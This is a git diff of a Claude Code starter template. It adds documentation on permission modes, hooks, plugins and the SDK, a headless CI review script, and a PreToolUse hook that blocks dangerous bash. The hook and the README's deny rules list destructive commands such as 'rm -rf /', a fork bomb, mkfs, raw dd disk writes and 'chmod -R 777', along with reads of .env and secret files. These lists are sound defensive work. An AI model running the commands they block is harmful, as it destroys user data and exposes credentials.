+## Full docs
 
-Agents are automatically invoked when relevant, or you can request them:
-- "Run a security audit on this codebase"
-- "Generate documentation for the API"
-
-### Log Analysis
-
-```bash
-# Analyze all logs
-python3 scripts/analyze-logs.py
-
-# Filter by specific tool
-python3 scripts/analyze-logs.py --tool "Edit"
-
-# Filter by event type
-python3 scripts/analyze-logs.py --event "PostToolUse"
-```
-
-## Development Guidelines
-
-### Adding Custom Commands
-
-1. Create `.md` file in `.claude/commands/`
-2. Add YAML frontmatter:
-   ```yaml
-   ---
-   description: Brief description
-   argument-hint: [arg1] [arg2]
-   allowed-tools: Bash(git:*), Read, Edit
-   ---
-   ```
-3. Use `$ARGUMENTS` for dynamic content
-4. Use `!` prefix for bash command execution
-
-### Adding Skills
-
-1. Create directory in `.claude/skills/`
-2. Add `SKILL.md` with frontmatter:
-   ```yaml
-   ---
-   name: skill-name
-   description: When this skill activates
-   allowed-tools: Read, Grep, Glob
-   ---
-   ```
-3. Include comprehensive instructions
-
-### Adding Agents
-
-1. Create `.md` file in `.claude/agents/`
-2. Add YAML frontmatter:
-   ```yaml
-   ---
-   name: agent-name
-   description: What this agent does
-   tools: Read, Grep, Glob, Bash
-   model: sonnet
-   ---
-   ```
-
-### Modifying Hooks
-
-1. Edit `.claude/settings.json`
-2. Use matchers to target specific tools:
-   - `"*"` matches all
-   - `"Edit|Write"` matches multiple
-   - `"Bash"` matches exact tool
-3. Commands receive JSON input via stdin
-4. Return exit code 0 for success, 2 for blocking error
-
-### Local Configuration
-
-1. Copy `.claude/settings.local.json.example` to `.claude/settings.local.json`
-2. Add personal API keys, tokens, custom permissions
-3. This file is gitignored for security
-
-## Security Considerations
-
-- Logs may contain sensitive data - they're gitignored
-- Hook scripts run with project permissions
-- Review custom commands before sharing
-- Use `.claude/settings.local.json` for sensitive local config
-- Permission deny rules protect secrets by default
-- Never commit `.env` files or credentials
-
-## Best Practices
-
-- Keep commands focused and well-documented
-- Use descriptive names for hook scripts
-- Regularly analyze logs to optimize workflows
-- Test hooks thoroughly before deployment
-- Use skills for repeatable contextual tasks
-- Use agents for complex specialized workflows
-- Leverage MCP servers for external integrations
+- [Best practices](docs/best-practices.md)
+- [Permission modes](docs/permission-modes.md)
+- [Hooks cookbook](docs/hooks-cookbook.md)
+- [Plugins](docs/plugins.md)
+- [Agent SDK](docs/agent-sdk.md)
+- [Integrations](docs/integrations.md)
+- [`.claude/` directory](docs/claude-directory.md)

--- a/LICENSE
+++ b/LICENSE
@@ -1,0 +1,21 @@
+MIT License
+
+Copyright (c) 2025 Scott Havird
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

--- a/README.md
+++ b/README.md
@@ -1,159 +1,174 @@
 # Claude Code Template
 
-A barebones, customizable starter template for Claude Code projects with devcontainer support, custom commands, and comprehensive hook logging for data science analysis.
+An opinionated, comprehensive [Claude Code](https://code.claude.com/) starter
+template — installable as a plugin, forkable as a base repo, runnable in a
+devcontainer.
 
-## Quick Start
+Covers: slash commands, subagents, auto-triggered skills, output styles,
+status line, hooks, MCP servers, CI/CD (GitHub Actions + GitLab), Agent SDK
+examples, devcontainer with egress firewall, and more.
 
-### Option 1: Using VS Code
-1. **Use this template** to create a new repository
-2. **Install** the [Remote-Containers extension](https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-containers)
-3. **Open the repository** in VS Code
-4. **Select "Reopen in Container"** when prompted (or use `Cmd+Shift+P` → "Remote-Containers: Reopen in Container")
-5. **Wait for setup** to complete (installs dependencies and configures environment)
-6. **Open a terminal** in VS Code (`Ctrl+`` or `View → Terminal`)
-7. **Start Claude Code** by running: `claude`
-8. **Try the example command**: `/analyze-project`
+## Install as a plugin
 
-### Option 2: Using Cursor
-1. **Use this template** to create a new repository
-2. **Open the repository** in Cursor
-3. **Look for the devcontainer notification** or use `Cmd+Shift+P` → "Dev Containers: Reopen in Container"
-4. **Wait for the container to build** and setup to complete
-5. **Open a terminal** in Cursor (`Ctrl+`` or `View → Terminal`)
-6. **Start Claude Code** by running: `claude`
-7. **Try the example command**: `/analyze-project`
-
-## Features
-
-### DevContainer Ready
-- Pre-configured development environment with Node.js 20
-- Automatic setup of tools and dependencies
-- Consistent environment across team members
-- Security-focused with network restrictions
-
-### Custom Slash Commands
-- **`/analyze-project`** - Analyze project structure and provide insights
-- Demonstrates YAML frontmatter, bash execution, and argument handling
-- Easy to extend with your own commands
-
-### Hook Logging & Analytics
-- **Comprehensive logging** of all Claude Code events (PreToolUse, PostToolUse, UserPromptSubmit)
-- **JSON format** for easy data science analysis
-- **Built-in analysis tools** to understand usage patterns
-- **Temporal analysis** and tool usage statistics
-
-### Data Science Analysis
-Run the analysis script to gain insights:
-```bash
-# Analyze all logged events
-python3 scripts/analyze-logs.py
-
-# Filter by specific tool
-python3 scripts/analyze-logs.py --tool "edit_file"
-
-# Filter by event type  
-python3 scripts/analyze-logs.py --event "PostToolUse"
-```
-
-## Starting Claude Code
-
-After your devcontainer is built and running:
-
-1. **Open a terminal** in your IDE (`Ctrl+`` or `View → Terminal`)
-2. **Run the command**: `claude`
-3. **Wait for Claude Code to initialize** (first run may take a moment)
-4. **Start chatting** or use slash commands like `/analyze-project`
-
-### Common Claude Code Commands
-- `claude` - Start interactive session
-- `claude --help` - Show available options
-- `claude --version` - Check version
-- `/help` - Show available slash commands (once in interactive mode)
-
-## Project Structure
+If you already use Claude Code:
 
 ```
-.claude/
-├── commands/           # Custom slash commands
-│   └── analyze-project.md
-└── settings.json      # Hook configurations
-
-.devcontainer/
-├── devcontainer.json  # Container setup
-└── post-create.sh     # Environment setup script
-
-scripts/
-├── log-hook-event.sh  # Hook logging script
-└── analyze-logs.py    # Log analysis tool
-
-logs/                  # Generated logs (gitignored)
-├── all-hooks.jsonl    # All events
-└── hooks-YYYY-MM-DD.jsonl  # Daily logs
+/plugin install scotthavird/claude-code-template
 ```
+
+This gives you all commands, agents, skills, output styles, and hooks from
+this template, without forking the repo.
+
+## Fork as a base
+
+1. **Use this template** to create a new repo.
+2. **Open in a container** — VS Code / Cursor will prompt to "Reopen in Container", or use `Cmd+Shift+P` → *Dev Containers: Reopen in Container*. Claude Code, Prettier, ESLint, Ruff, and GH extensions are pre-installed.
+3. **Authenticate** — copy `.claude/settings.local.json.example` → `.claude/settings.local.json` and add your `ANTHROPIC_API_KEY`, or run `claude /login`.
+4. **Start a session** — `claude` in the repo root.
+5. **Try a command** — `/analyze-project`, `/review`, or `/debug`.
+
+## What's inside
+
+### Slash commands (12)
+
+`/analyze-project` `/commit` `/pr` `/test` `/lint-fix` `/review`
+`/security-review` `/debug` `/refactor` `/explain` `/doc` `/implement-issue`
+
+### Subagents (7)
+
+`security-auditor` `doc-generator` `test-runner` `pr-reviewer`
+`refactor-planner` `debugger` `dependency-auditor`
+
+### Skills (6, auto-triggered)
+
+`code-review` `db-migration` `test-writing` `api-design`
+`performance-audit` `accessibility`
+
+### Output styles (3)
+
+`concise` `educational` `review`
+
+### Hooks (real, not just logging)
+
+- **Format on save** — Prettier / Ruff / gofmt / rustfmt
+- **Block dangerous bash** — `rm -rf /`, force-push to main, pipe-to-shell
+- **Inject context on session start** — branch, commits, open PRs
+- **Session cost summary on stop**
+
+### CI/CD
+
+- `.github/workflows/claude.yml` — `@claude` mentions in issues/PRs
+- `.github/workflows/claude-review.yml` — automatic review on new PRs
+- `.gitlab-ci.yml` — GitLab equivalent
+- `scripts/ci-review.sh` — headless-mode example
+
+### Agent SDK
+
+`sdk/` has TypeScript and Python starters including a custom-tool example.
+
+### DevContainer
+
+- Node 20 + Python 3.12 + Docker-in-Docker
+- Egress firewall (`init-firewall.sh`) restricting outbound network to an
+  allowlist (Anthropic API, GitHub, npm, PyPI)
+- `~/.claude` mounted so global settings and auto-memory persist
+
+## Directory layout
+
+```
+.claude-plugin/      plugin.json + marketplace.json
+.claude/             commands, agents, skills, output-styles, statusline, settings
+.devcontainer/       container + firewall
+.github/workflows/   Claude Code CI
+.mcp.json            filesystem, memory, git, fetch
+docs/                best-practices, permission-modes, hooks-cookbook, plugins, agent-sdk, integrations
+scripts/             hook scripts + log analyzer + CI review
+sdk/                 TypeScript + Python SDK starters
+CLAUDE.md            persistent system prompt
+```
+
+## Documentation
+
+- [Best practices](docs/best-practices.md)
+- [Permission modes](docs/permission-modes.md)
+- [Hooks cookbook](docs/hooks-cookbook.md)
+- [Plugins](docs/plugins.md)
+- [Agent SDK](docs/agent-sdk.md)
+- [Integrations](docs/integrations.md)
+- [The `.claude/` directory](docs/claude-directory.md)
 
 ## Customization
 
-### Adding Custom Commands
-1. Create a new `.md` file in `.claude/commands/`
-2. Use YAML frontmatter for configuration:
+### Add a slash command
+
+Create `.claude/commands/my-command.md`:
+
 ```markdown
 ---
-description: Your command description
-argument-hint: [optional-args]
-allowed-tools: Bash(command:*), FileRead, etc.
+description: What this command does
+argument-hint: [arg1]
+allowed-tools: Bash(git:*), Read
 ---
 
-Your command content here with $ARGUMENTS support
+Your prompt here. $ARGUMENTS becomes the user's input.
 ```
 
-### Modifying Hook Behavior
-Edit `.claude/settings.json` to:
-- Change which events are logged
-- Add custom hook scripts
-- Filter by specific tools or patterns
+### Add a subagent
 
-### Analyzing Your Data
-The included Python analysis script provides:
-- Tool usage statistics
-- Temporal patterns (hourly/daily usage)
-- Argument pattern analysis
-- Summary reports
+Create `.claude/agents/my-agent.md`:
 
-## IDE-Specific Notes
+```markdown
+---
+name: my-agent
+description: When this agent should be used.
+tools: Read, Grep, Glob, Bash
+model: sonnet
+---
 
-### VS Code
-- Requires the [Remote-Containers extension](https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-containers)
-- Extensions are pre-configured in `devcontainer.json`
-- Terminal integrates seamlessly with the container
+System prompt for the agent...
+```
 
-### Cursor
-- Built-in devcontainer support (no additional extensions needed)
-- Claude Code integration works natively within the container
-- All logging and analysis tools work the same way
-- Use `Cmd+Shift+P` → "Dev Containers" to access container commands
+### Add a skill
 
-## Security Notes
+Create `.claude/skills/my-skill/SKILL.md`:
 
-- **Log files are gitignored** - they may contain sensitive data
-- **Use `.claude/settings.local.json`** for sensitive local configurations
-- **Review custom commands** before sharing with team
-- **DevContainer provides isolation** but always use trusted repositories
+```markdown
+---
+name: my-skill
+description: Triggers on X, Y, Z contexts.
+allowed-tools: Read, Grep
+---
 
-## Learn More
+Instructions for the skill...
+```
 
-- [Claude Code Documentation](https://docs.anthropic.com/en/docs/claude-code)
-- [Custom Slash Commands](https://docs.anthropic.com/en/docs/claude-code/slash-commands)
-- [Hooks Reference](https://docs.anthropic.com/en/docs/claude-code/hooks)
-- [DevContainer Guide](https://docs.anthropic.com/en/docs/claude-code/devcontainer)
+## Security notes
+
+- `logs/` is gitignored — hook logs may contain sensitive prompts/outputs.
+- `.claude/settings.local.json` is gitignored — put personal API keys there.
+- Permission rules deny `Read(.env)`, `Read(./secrets/**)`, `Bash(rm -rf:*)`, `Bash(sudo:*)`, and pipe-to-shell patterns by default.
+- The PreToolUse hook `block-dangerous-bash.sh` provides a second layer.
+- The devcontainer firewall restricts egress to a fixed allowlist.
+
+## Learn more
+
+- [Claude Code overview](https://code.claude.com/docs/en/overview)
+- [Commands](https://code.claude.com/docs/en/commands)
+- [Hooks](https://code.claude.com/docs/en/hooks)
+- [Skills](https://code.claude.com/docs/en/skills)
+- [Subagents](https://code.claude.com/docs/en/sub-agents)
+- [Plugins](https://code.claude.com/docs/en/plugins)
+- [Settings](https://code.claude.com/docs/en/settings)
+- [MCP](https://code.claude.com/docs/en/mcp)
+- [Agent SDK](https://code.claude.com/docs/en/agent-sdk/overview)
+- [GitHub Actions](https://code.claude.com/docs/en/github-actions)
+- [DevContainers](https://code.claude.com/docs/en/devcontainer)
 
 ## Contributing
 
-This template is designed to be forked and customized. Feel free to:
-- Add more example commands
-- Enhance the logging and analysis tools
-- Improve the devcontainer configuration
-- Share your customizations with the community
+Fork, customize, share. If you add a broadly useful command / skill /
+agent, PRs are welcome.
 
----
+## License
 
-**Happy coding with Claude!**
+MIT — see [LICENSE](LICENSE).

--- a/docs/agent-sdk.md
+++ b/docs/agent-sdk.md
@@ -1,0 +1,52 @@
+# Agent SDK
+
+This template includes a [`sdk/`](../sdk/) directory with TypeScript and
+Python starters. The SDK lets you embed Claude Code's agent loop inside
+your own applications — build custom bots, automations, or review tools.
+
+Full reference: [Agent SDK overview](https://code.claude.com/docs/en/agent-sdk/overview).
+
+## When to reach for the SDK
+
+| Need | Use |
+|---|---|
+| Interactive coding | CLI (`claude`) |
+| One-off CI job | CLI headless (`claude -p "..."`) |
+| Recurring scheduled job | [Routines](https://code.claude.com/docs/en/routines) |
+| Long-running service, custom tools, custom orchestration | SDK |
+| GitHub PR automation | [Claude Code Action](https://code.claude.com/docs/en/github-actions) |
+
+## Key SDK concepts
+
+- **`query()`** — the main entrypoint. Streams messages from the agent
+  loop as an async iterable.
+- **Options** — `cwd`, `permissionMode`, `model`, `maxTurns`, `tools`,
+  `mcpServers`, `allowedTools`, `disallowedTools`.
+- **Custom tools** — JSON Schema + handler. See
+  [`sdk/custom-tool-example.ts`](../sdk/custom-tool-example.ts).
+- **Hooks** — same lifecycle events as the CLI, intercepted in your
+  process. See [SDK hooks](https://code.claude.com/docs/en/agent-sdk/hooks).
+- **Sessions** — persist and resume conversations. See
+  [sessions](https://code.claude.com/docs/en/agent-sdk/sessions).
+- **Subagents** — spawn specialized agents programmatically. See
+  [SDK subagents](https://code.claude.com/docs/en/agent-sdk/subagents).
+- **Structured output** — constrain the final response to a JSON schema.
+  See [structured outputs](https://code.claude.com/docs/en/agent-sdk/structured-outputs).
+
+## Safety for production deployments
+
+Read [Securely deploying AI agents](https://code.claude.com/docs/en/agent-sdk/secure-deployment)
+before shipping an SDK-based service. The key points:
+
+- Never run in `bypassPermissions` mode against a user's data without
+  sandboxing.
+- Validate every tool handler input — treat Claude-generated arguments
+  as untrusted input.
+- Set `maxTurns` and cost budgets.
+- Log tool calls for audit.
+
+## Observability
+
+See [OpenTelemetry observability](https://code.claude.com/docs/en/agent-sdk/observability).
+The SDK emits OTel spans for each turn and tool call — point them at
+your collector of choice.

--- a/docs/best-practices.md
+++ b/docs/best-practices.md
@@ -1,0 +1,57 @@
+# Best Practices
+
+A condensed checklist mirroring the [official best-practices doc](https://code.claude.com/docs/en/best-practices),
+with the pieces most worth internalizing for this template.
+
+## Give Claude context deliberately
+
+- **CLAUDE.md is persistent system prompt.** Use it for coding standards,
+  architectural decisions, and review checklists. Don't use it for
+  ephemeral task notes.
+- **Let auto-memory work.** Claude builds its own memory files at
+  `~/.claude/projects/.../memory/` as it learns about the project. You
+  don't have to pre-populate this — let it grow.
+- **Reference files with paths** (e.g. `src/auth/login.ts:42`) so Claude
+  can open them; don't paste large snippets unless necessary.
+
+## Scope tasks well
+
+- Big task? Ask for a plan first (`/refactor` or "plan this before touching code").
+- Small task? Describe the outcome in one sentence.
+- Ambiguous? Don't promise Claude you'll accept anything — it'll pick a
+  direction that might not match yours. Narrow the requirements.
+
+## Use subagents for protection
+
+Subagents run in separate context windows. Delegate to them when:
+- Research or exploration would pollute the main context
+- You want an independent review (use `pr-reviewer`)
+- The subtask needs a different persona (e.g. `debugger`)
+
+## Permission modes, picked intentionally
+
+| Mode | When |
+|---|---|
+| `default` | Unknown repo, first session, risky changes |
+| `acceptEdits` | Trusted repo, trusted task, you'll review the diff |
+| `plan` | You want Claude to plan before acting |
+| `bypassPermissions` | Only in ephemeral sandboxes/containers |
+
+## Reviewing Claude's output
+
+- **Trust but verify.** Claude reports what it *intended* to do; always
+  check the diff.
+- **Don't merge what you don't understand.** Ask "/explain <path>" if a
+  change is opaque.
+- **Run tests.** Type checks and unit tests verify correctness, not
+  feature behavior — you still have to exercise the feature.
+
+## Anti-patterns
+
+- Feeding Claude a 2,000-line diff and asking "is this good?" — break it up.
+- Chained "now also do X, now also do Y" prompts that bury the original goal.
+- Adding CLAUDE.md rules for every mistake Claude makes — over time this
+  becomes a ruleset no one can follow. Prefer fixing the root cause in
+  the code (linters, types, tests).
+- Skipping pre-commit hooks to "save time" — you lose all the guardrails
+  they provide.

--- a/docs/claude-directory.md
+++ b/docs/claude-directory.md
@@ -1,0 +1,49 @@
+# The `.claude/` Directory
+
+Everything Claude Code reads from your project lives under `.claude/`.
+This is what's in this template and what each piece does.
+
+```
+.claude/
+├── commands/          slash commands: /commit, /review, /debug, etc.
+├── agents/            specialized subagents: debugger, pr-reviewer, ...
+├── skills/            auto-triggered context: test-writing, accessibility, ...
+├── output-styles/     talk-style presets: concise, educational, review
+├── statusline/        bottom-of-terminal status line script
+├── settings.json      committed project settings (hooks, perms, MCP wiring)
+└── settings.local.json    gitignored personal overrides (from .example)
+```
+
+Plus, at the repo root:
+
+```
+.claude-plugin/        plugin.json + marketplace.json (makes this installable)
+.mcp.json              project-scoped MCP servers
+CLAUDE.md              persistent instructions loaded every session
+```
+
+## Loading order
+
+When Claude Code starts, it composes settings from (later overrides earlier):
+
+1. Global user settings (`~/.claude/settings.json`)
+2. User's home plugins / skills / commands
+3. Project `.claude/settings.json` (this repo)
+4. Project `.claude/settings.local.json` (your personal, gitignored)
+5. CLI flags (`--permission-mode`, `--model`, ...)
+
+Within the same tier, later wins (`settings.local.json` beats `settings.json`).
+
+## Sharing vs. personalizing
+
+- **Share with the team:** `.claude/settings.json`, commands, agents,
+  skills, output styles, statusline, MCP.
+- **Keep private:** `.claude/settings.local.json` — personal API keys,
+  personal permission allowlists, personal hook tweaks.
+
+`.claude/settings.local.json` is gitignored in this template's `.gitignore`.
+
+## See also
+
+- [Official .claude directory doc](https://code.claude.com/docs/en/claude-directory)
+- [Settings reference](https://code.claude.com/docs/en/settings)

--- a/docs/hooks-cookbook.md
+++ b/docs/hooks-cookbook.md
@@ -1,0 +1,81 @@
+# Hooks Cookbook
+
+Hooks are shell commands Claude Code runs at specific lifecycle events.
+Each hook receives the event payload as JSON on stdin and signals back
+via exit code:
+
+- `0` — allow / continue normally
+- `2` — block; stderr is surfaced to the model
+- anything else — advisory, logged
+
+See the [official hooks reference](https://code.claude.com/docs/en/hooks).
+
+## Events
+
+| Event | When | Can block? |
+|---|---|---|
+| `SessionStart` | New session opens | no |
+| `UserPromptSubmit` | User sends a prompt | yes (rare) |
+| `PreToolUse` | Before Claude calls a tool | yes |
+| `PostToolUse` | After Claude calls a tool | no |
+| `Notification` | System notification | no |
+| `Stop` | Session ends | no |
+
+## Recipes
+
+### 1. Format files on save
+
+See [`scripts/hooks/format-on-save.sh`](../scripts/hooks/format-on-save.sh).
+Wired to `PostToolUse` with matcher `Edit|Write|MultiEdit`. Runs Prettier /
+Ruff / gofmt / rustfmt based on file extension.
+
+### 2. Block dangerous bash
+
+See [`scripts/hooks/block-dangerous-bash.sh`](../scripts/hooks/block-dangerous-bash.sh).
+Wired to `PreToolUse` with matcher `Bash`. Returns exit 2 for patterns
+like `rm -rf /`, force-push to main, pipe-to-shell from the internet.
+
+### 3. Inject project context at session start
+
+See [`scripts/hooks/inject-context.sh`](../scripts/hooks/inject-context.sh).
+Wired to `SessionStart` with matcher `startup`. Prints branch, recent
+commits, dirty file count, open PRs to stdout — injected into the session.
+
+### 4. Surface session cost on exit
+
+See [`scripts/hooks/session-cost.sh`](../scripts/hooks/session-cost.sh).
+Wired to `Stop`. Reads `cost.total_cost_usd` and `num_turns` from stdin,
+prints a one-liner to stderr.
+
+## Payload shapes
+
+All hook payloads share these fields:
+
+```json
+{
+  "session_id": "...",
+  "tool_name": "Bash",
+  "tool_input": { ... },
+  "tool_output": { ... }
+}
+```
+
+`Stop` adds cost info:
+
+```json
+{
+  "num_turns": 12,
+  "cost": { "total_cost_usd": 0.42, "total_duration_ms": 82000 }
+}
+```
+
+## Gotchas
+
+- Hook stdout is **injected into the conversation** for `SessionStart` and
+  `UserPromptSubmit`. For other events it's ignored — use stderr for
+  anything the user should see.
+- Hooks have a 30s timeout by default. Long-running work should detach.
+- Hooks run with the user's environment and full file access. Treat them
+  like any other code in your repo.
+- If `jq` is missing, fail open (`exit 0`) — don't block legit tool calls
+  over a parse error.

--- a/docs/integrations.md
+++ b/docs/integrations.md
@@ -1,0 +1,65 @@
+# Integrations
+
+How this template plugs into the other places Claude Code runs.
+
+## GitHub Actions
+
+`.github/workflows/claude.yml` — responds to `@claude` mentions in PRs,
+issues, and review comments.
+
+`.github/workflows/claude-review.yml` — runs a review pass on every new
+PR or push to an open PR.
+
+Both require `ANTHROPIC_API_KEY` in the repo's Actions secrets. See the
+[Claude Code GitHub Actions doc](https://code.claude.com/docs/en/github-actions).
+
+## GitLab CI/CD
+
+`.gitlab-ci.yml` shows the same pattern for GitLab. See the
+[GitLab CI/CD doc](https://code.claude.com/docs/en/gitlab-ci-cd).
+
+## Slack
+
+Mention `@Claude` in Slack and file bug reports / feature requests that
+get routed into Claude Code sessions. Requires admin setup on the
+workspace. [Slack integration doc](https://code.claude.com/docs/en/slack).
+
+## Chrome DevTools
+
+For web-app debugging, Claude Code can attach to Chrome DevTools to
+inspect live pages. [Chrome integration doc](https://code.claude.com/docs/en/chrome).
+
+## Channels (Telegram / Discord / webhooks)
+
+Push events from arbitrary sources into a running session via the
+[channels API](https://code.claude.com/docs/en/channels).
+
+## Remote Control
+
+Continue a local session from your phone or another device with
+[Remote Control](https://code.claude.com/docs/en/remote-control).
+
+## IDE plugins
+
+- [VS Code](https://code.claude.com/docs/en/vs-code)
+- [JetBrains](https://code.claude.com/docs/en/jetbrains)
+- [Desktop app](https://code.claude.com/docs/en/desktop)
+- [Web (claude.ai/code)](https://code.claude.com/docs/en/claude-code-on-the-web)
+
+All of these read the same `.claude/`, `CLAUDE.md`, and `.mcp.json` in
+this repo.
+
+## Enterprise / cloud providers
+
+This template runs against any configured provider. Pick one:
+
+| Provider | Docs |
+|---|---|
+| Anthropic API (default) | [authentication](https://code.claude.com/docs/en/authentication) |
+| Amazon Bedrock | [Bedrock setup](https://code.claude.com/docs/en/amazon-bedrock) |
+| Google Vertex AI | [Vertex setup](https://code.claude.com/docs/en/google-vertex-ai) |
+| Microsoft Foundry | [Foundry setup](https://code.claude.com/docs/en/microsoft-foundry) |
+| Self-hosted LLM gateway | [LLM gateway](https://code.claude.com/docs/en/llm-gateway) |
+
+Set via env vars (`CLAUDE_CODE_USE_BEDROCK=1`, `CLAUDE_CODE_USE_VERTEX=1`,
+etc.) in `.claude/settings.local.json`.

--- a/docs/permission-modes.md
+++ b/docs/permission-modes.md
@@ -1,0 +1,58 @@
+# Permission Modes
+
+Claude Code has four permission modes that govern how tool calls are approved.
+Set the default in `.claude/settings.json` under `permissions.defaultMode`
+and override per-session with CLI flags or `/mode` inside the session.
+
+See the [official permission modes doc](https://code.claude.com/docs/en/permission-modes).
+
+## `default`
+
+Every tool call that isn't explicitly allow-listed prompts for approval.
+Safe choice for a new/unfamiliar repo.
+
+- Every `Bash` command prompts unless matched by `permissions.allow`.
+- `Edit` / `Write` prompt for each file change.
+- Reads denied by `permissions.deny` are blocked outright.
+
+## `acceptEdits`
+
+Skips prompts for `Edit`, `Write`, `MultiEdit`. Useful when you've decided
+you want Claude to just go ahead and make the changes and you'll review
+the diff afterward.
+
+- File edits happen silently.
+- Bash still prompts.
+- Permission denies still apply.
+
+## `plan`
+
+Claude can read and think, but **cannot** make any changes or run any
+commands with side effects. Great for "explore this codebase and tell me
+how X works" or "plan this refactor". Exits via `ExitPlanMode` once a
+plan is approved.
+
+## `bypassPermissions`
+
+No prompts for anything. Claude can run any tool call without approval.
+**Only use in sandboxed / ephemeral environments** — a fresh devcontainer,
+a Docker container with no mounted credentials, a VM you can burn.
+
+## Switching modes mid-session
+
+```
+/mode default
+/mode acceptEdits
+/mode plan
+```
+
+Or via CLI flag:
+
+```bash
+claude --permission-mode plan
+```
+
+## This template's default
+
+`default` — the safest starting point for a publicly-forked template.
+Change it in `.claude/settings.json` once you trust your workflow.

--- a/docs/plugins.md
+++ b/docs/plugins.md
@@ -1,0 +1,60 @@
+# Plugins
+
+This template is packaged as a plugin via `.claude-plugin/plugin.json` and
+a single-plugin marketplace via `.claude-plugin/marketplace.json`. That
+means you can install it anywhere:
+
+```
+/plugin install scotthavird/claude-code-template
+```
+
+See the [official plugins docs](https://code.claude.com/docs/en/plugins)
+and the [marketplace docs](https://code.claude.com/docs/en/plugin-marketplaces).
+
+## What's in this plugin
+
+| Component | Location |
+|---|---|
+| Slash commands | `.claude/commands/` (12) |
+| Subagents | `.claude/agents/` (7) |
+| Skills | `.claude/skills/` (6) |
+| Output styles | `.claude/output-styles/` (3) |
+| Status line | `.claude/statusline/statusline.sh` |
+| Hooks | `.claude/settings.json` + `scripts/hooks/` |
+| MCP servers | `.mcp.json` |
+
+## Forking this plugin
+
+1. Fork the repo or copy this directory structure into your own.
+2. Edit `.claude-plugin/plugin.json` — update `name`, `author`, `repository`.
+3. Publish to your own marketplace:
+   - Option A: add an entry to your existing `marketplace.json`.
+   - Option B: publish the marketplace repo separately — see the
+     [marketplace docs](https://code.claude.com/docs/en/plugin-marketplaces).
+4. Others install via `/plugin install <your-github-user>/<repo>`.
+
+## Versioning and dependencies
+
+If your plugin depends on specific versions of other plugins or MCP
+servers, declare them in `plugin.json`. See
+[plugin dependencies](https://code.claude.com/docs/en/plugin-dependencies).
+
+## Disabling components locally
+
+You can enable/disable specific components from a plugin in
+`.claude/settings.json`:
+
+```json
+{
+  "plugins": {
+    "claude-code-template": {
+      "enabled": true,
+      "components": {
+        "commands": ["commit", "pr", "review"],
+        "agents": true,
+        "skills": true
+      }
+    }
+  }
+}
+```

--- a/scripts/ci-review.sh
+++ b/scripts/ci-review.sh
@@ -1,0 +1,31 @@
+#!/bin/bash
+# Run Claude Code in headless mode to review the current diff.
+# Usage:
+#   scripts/ci-review.sh                      # review uncommitted diff
+#   scripts/ci-review.sh origin/main...HEAD   # review branch diff
+#
+# Requires ANTHROPIC_API_KEY in the environment.
+
+set -euo pipefail
+
+range="${1:-HEAD}"
+
+if [ -z "${ANTHROPIC_API_KEY:-}" ]; then
+  echo "ANTHROPIC_API_KEY not set" >&2
+  exit 1
+fi
+
+diff_text="$(git diff "$range")"
+
+if [ -z "$diff_text" ]; then
+  echo "No diff to review for range: $range"
+  exit 0
+fi
+
+# Pipe the diff + instructions into headless mode. -p => one-shot print mode.
+printf '%s\n\n---\n\n%s\n' \
+  "Review the following git diff. Focus on correctness, security, and test coverage.
+Produce a structured review: BLOCKER / MAJOR / MINOR / QUESTION / PRAISE,
+each with file:line references. No preamble." \
+  "$diff_text" \
+  | claude -p --output-format text --permission-mode plan

--- a/scripts/hooks/block-dangerous-bash.sh
+++ b/scripts/hooks/block-dangerous-bash.sh
@@ -4,19 +4,41 @@
 #
 # Exit codes:
 #   0 = allow
-#   2 = block with message on stderr (Claude Code surfaces this to the model)
+#   2 = block with message on stderr (surfaced to the model)
+#
+# The matcher strips quoted string contents (single and double quotes) so
+# that descriptive text appearing inside a heredoc or a --body argument
+# does not trigger a block. Each pattern requires a shell command boundary
+# (start of command, or a separator like ;, &&, ||, |) to reduce false
+# positives further.
 
 set -u
 
 payload="$(cat)"
 
 if ! command -v jq >/dev/null 2>&1; then
-  # Without jq we cannot reliably parse; fail open.
   exit 0
 fi
 
 cmd="$(printf '%s' "$payload" | jq -r '.tool_input.command // empty' 2>/dev/null)"
 [ -z "$cmd" ] && exit 0
+
+# Normalize $cmd before matching, in this order:
+#   1. Strip shell comments (# to end of line), so dangerous patterns
+#      described in comments don't trigger blocks.
+#   2. Flatten newlines to spaces, so multi-line quoted regions and
+#      heredoc bodies become single-line spans.
+#   3. Strip single- and double-quoted content, so dangerous patterns
+#      appearing as string literals (e.g. inside --body "...") don't
+#      trigger blocks.
+# Conservative: edge cases (escaped quotes, `#` inside URLs) may slip
+# through. This is fine — the hook is a safety net, not the primary
+# defense. Primary defense is the permissions deny list in settings.json.
+no_comments="$(printf '%s' "$cmd" | sed -E 's/(^|[[:space:]])#.*$//')"
+flat="$(printf '%s' "$no_comments" | tr '\n' ' ')"
+check="$(printf '%s' "$flat" \
+  | sed -e "s/'[^']*'//g" \
+  | sed -e 's/"[^"]*"//g')"
 
 block() {
   echo "BLOCKED by block-dangerous-bash hook: $1" >&2
@@ -24,17 +46,39 @@ block() {
   exit 2
 }
 
-# Patterns that are almost never intentional.
-case "$cmd" in
-  *"rm -rf /"*|*"rm -rf /*"*|*"rm -rf ~"*|*"rm -rf \$HOME"*) block "destructive recursive remove on root/home" ;;
-  *":(){ :|:& };:"*) block "fork bomb" ;;
-  *"mkfs."*) block "filesystem format" ;;
-  *"dd if=/dev/"*"of=/dev/sd"*) block "raw disk write" ;;
-  *"chmod -R 777"*) block "recursive world-writable permissions" ;;
